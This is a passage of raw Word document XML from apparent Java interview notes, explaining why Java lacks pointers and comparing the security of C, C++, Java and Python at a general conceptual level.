    <w:p w14:paraId="688B7C0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CE4B95"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6" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B1F4F1" w14:textId="3C194F70" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="00467575">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc197867243"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Does Java support Pointers</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="68E5F309" w14:textId="28900D44" w:rsidR="009F6896" w:rsidRPr="00CE4B95" w:rsidRDefault="009F6896" w:rsidP="0074059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Java does not support pointers like C or C++ does.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB7BC8D" w14:textId="547305A4"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0CC9566D"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with the goal of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3948413B"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ty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A4E5E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city</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEC587B" w14:textId="00701A12"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ce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450B3968"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ing raw memory access through pointers (like in C/C++) can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2064079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d to security vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4DB797"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 memory corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EE6AF5" w14:textId="487A63A6"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garbage collection impossible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7389FA0A"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27" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4A44F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CE4B95" w14:paraId="64F28BCB" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F43E6BC"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Alternative</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6896" w:rsidRPr="00CE4B95" w14:paraId="2F360E7C" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47E9D52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object handles, no direct memory access)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6896" w:rsidRPr="00CE4B95" w14:paraId="2DEDB1FA" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47D67F7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Garbage Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6896" w:rsidRPr="00CE4B95" w14:paraId="0112DDE6" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12D19D70"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 at all</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BD7674B" w14:textId="4B568FD5"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EC77D2E" w14:textId="403BA561" w:rsidR="00C81F35" w:rsidRPr="00CE4B9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12F85D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t get its address or do pointer math like s++.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE43FC"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28" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B3176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CE4B95" w14:paraId="214D6DD5" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26961F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ferences (Java)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6896" w:rsidRPr="00CE4B95" w14:paraId="5772288E" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="327B5A79"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no control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6896" w:rsidRPr="00CE4B95" w14:paraId="7B1269D7" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="518AB1F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r>
      <w:tr w:rsidR="009F6896" w:rsidRPr="00CE4B95" w14:paraId="5B5A2178" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C7363C1"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still safer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F6896" w:rsidRPr="00CE4B95" w14:paraId="7D575DB4" w14:textId="77777777" w:rsidTr="009F6896">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BC2EF3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level programming</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BB2B1E3"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29" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="315F0FB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Handles the Memory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EB509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Pr="00CE4B95"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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7195F6C2" w14:textId="0515D3D6" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="004A110F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc197867244"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why doesn't java support pointers</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="1E649CFA" w14:textId="40389A7A" w:rsidR="005739E0" w:rsidRPr="00CE4B95" w:rsidRDefault="005739E0" w:rsidP="008015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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3191AE86" w14:textId="77777777"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allow direct memory access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7910B840" w14:textId="7E1CCA81"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lead to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A49502"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 overflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6005DCA8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D76A9C" w14:textId="6344C351"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uthorized memory access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28219CBE" w14:textId="426D494B"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="509BE516"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2.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implicity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFCE1C7"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to be simple and easy to use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F17297E"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ing pointers removes a major source of bugs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F99F8C"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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="786AA9C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E388134"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uses automatic garbage collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA1EE9B"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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AD2673"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4.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voids Manual Memory Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D862C7A" w14:textId="77777777" w:rsidR="001C7F24"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nguages like C/C++, you need to malloc/free memory manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046D535C" w14:textId="2E8FCBB2" w:rsidR="005739E0"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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC9B1F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Uses Instead?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C102612" w14:textId="77777777" w:rsidR="003164AE"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 like pointers, but:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCFC9AB"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irect access to memory addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079EC2C7"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pointer arithmetic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E484D8" w14:textId="287E12AA" w:rsidR="005739E0"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and tracked by the JVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47816E3C" w14:textId="3513C94E" w:rsidR="005739E0" w:rsidRPr="00CE4B95"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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="239BAF65" w14:textId="2D8E2239" w:rsidR="00502865" w:rsidRPr="00CE4B95" w:rsidRDefault="009A7C02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc197867245"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain which language you prefer in terms of security among C, C++, Java and Python</w:t>
      </w:r>
      <w:r w:rsidR="00502865" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="43C1E8EB" w14:textId="3A76F6EF" w:rsidR="00133B25" w:rsidRPr="00CE4B9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ach of these languages has its own strengths and weaknesses when it comes to </w:t>
      </w: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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>security aspects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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6" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="115341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Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420088E6"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2990B04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automatic garbage collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which helps avoid memory leaks and dangling pointers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC7E9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ointers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Java doesn’t support pointers, which prevents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angling pointer iss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4643FC8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Java has a built-in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>robust exception handling system</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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xml:space="preserve">: Java runs on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and uses </w:t>
      </w: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Manager</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Typing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Java is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>strongly typed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, so </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>type-related errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are caught at compile-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1083DEE4"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2E0A9B75"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Libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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erialization Issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Older or improperly implemented code may be vulnerable to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java deserialization attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where malicious data is processed by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F3D455"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37" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23258FC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Python:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7309A9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54B47B4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evel Language</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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Like Java, Python ha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through garbage collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8FB2E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Python's </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>readable syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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Typing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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6274DF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Typing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The lack of compile-time type checking means that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>type-related bugs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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Libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Python has security issues related to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unsafe libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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d Language</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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38" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF6ADA1"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C++:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6FA19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1496651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rol Over System Resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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in High-Security Systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: These languages are often used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>security-critical applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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77F8054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C and C++ require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malloc, free), which is prone to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ngling pointers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EEBFE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Pointers and pointer arithmetic make </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>buffer overflow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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Protection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: C/C++ provides minimal </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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r w:rsidRPr="00CE4B9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39" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="370475CA"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 (Compared to C):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41278FF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 inherits most of the security risks of C, but it adds some additional features like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>object-oriented programm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II (Resource Acquisition Is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ceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for better error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CAB87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s extra features</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can potentially help reduce some security risks, but C++ still requires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making it still prone to security vulnerabilities like C.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D12AC5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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="006AE8B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ich Language is More Secure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206E7D3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oesn’t have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pointers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, avoiding many low-level vulnerabilities (e.g.,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7E2C91A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 security checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDDE12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as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and runs in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
